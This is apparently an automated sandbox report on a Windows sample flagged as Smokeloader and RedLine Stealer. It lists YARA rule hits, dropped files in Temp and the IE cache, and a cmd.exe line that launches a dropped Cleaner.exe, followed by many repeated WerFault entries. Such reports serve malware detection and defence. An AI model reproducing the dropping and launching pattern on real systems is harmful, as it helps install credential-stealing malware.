                Source: 00000000.00000000.307684554.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000000.261493549.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000000.270666653.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000000.260670257.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000000.293688181.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000000.300426883.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000000.285114416.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000000.265318606.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000000.266050637.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000000.293620841.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000000.292559864.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000000.299699149.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000000.292621686.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000000.286093708.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 528
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe | Code function: 33_2_00007FFBB00C28C2
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe | Code function: 33_2_00007FFBB00C2EE5
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe | Code function: 33_2_00007FFBB00C1B2E
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe | Code function: 33_2_00007FFBB00CA91D
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe | Code function: 33_2_00007FFBB00C394F
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe | Code function: 33_2_00007FFBB00C553E
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe | Code function: 33_2_00007FFBB00C3F72
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe | Code function: 33_2_00007FFBB00C9B6D
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe | Code function: 33_2_00007FFBB00C678F
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe | Code function: 33_2_00007FFBB00C57D8
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe | Code function: 33_2_00007FFBB00C4601
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe | Code function: 33_2_00007FFBB00C4EDD
Source: file.exe | Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: file.exe, 00000000.00000003.345054992.0000000003940000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.344736668.0000000003746000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.349013396.0000000003B83000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.344047493.0000000003935000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.343086335.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.347627811.000000000374D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.342413106.0000000003927000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.349485189.000000000374C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.344369058.0000000003B27000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.341121429.0000000003749000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.343503756.000000000374B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.346281710.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.348412954.000000000396A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\soft[1] C394B068AA87264419F60838A8812B750E67CF93F2494C62B9078C3708072568
Source: Cleaner.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe | ReversingLabs: Detection: 47%
Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 528
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 700
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 732
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 744
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 776
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 900
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 964
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1152
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1280
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1272
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe
Source: C:\Users\user\Desktop\file.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe"
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Cleaner.lnk.0.dr | LNK file: ..\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t
Source: classification engine | Classification label: mal100.troj.winEXE@17/52@1/5
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5380
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5188:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: [C:\zakalajoviziw83\mali-xaduvovije95\bahowe\51\xayiziket\fov.pdbPXC-@ source: file.exe
Source: Binary string: C:\zakalajoviziw83\mali-xaduvovije95\bahowe\51\xayiziket\fov.pdb source: file.exe
Source: Cleaner.exe.0.dr | Static PE information: 0xEAE49AF1 [Wed Nov 17 16:40:17 2094 UTC]
Source: initial sample | Static PE information: section name: .text entropy: 7.920922021912582
Source: initial sample | Static PE information: section name: .text entropy: 7.920922021912582
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\dll[1]
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\soft[1]
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\soft[1]
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Bunifu_UI_v1.5.3.dll
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\dll[1]
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
